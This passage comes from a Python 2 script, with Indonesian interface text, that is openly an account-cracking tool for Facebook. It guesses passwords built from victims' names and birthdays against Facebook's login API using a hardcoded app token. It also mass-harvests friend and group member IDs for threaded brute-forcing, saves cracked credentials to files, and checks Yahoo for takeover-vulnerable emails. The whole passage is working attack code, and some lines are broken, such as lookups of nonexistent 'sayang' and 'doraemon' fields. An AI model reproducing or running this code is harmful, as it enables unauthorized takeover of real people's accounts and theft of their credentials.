print '\x1b[1;91m[?] \x1b[1;92mNomor Telpon\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLahir\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak Ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Clone'
print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(0.01)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
pass2 = b['sayang'] + 'sayang'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + ['name']
else:
pass3 = b['doraemon'] + 'doraemon'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
pass4 = b['last_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
pass6 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mKamu ingin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak Ditemukan'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token Tidak Ada'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mSimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
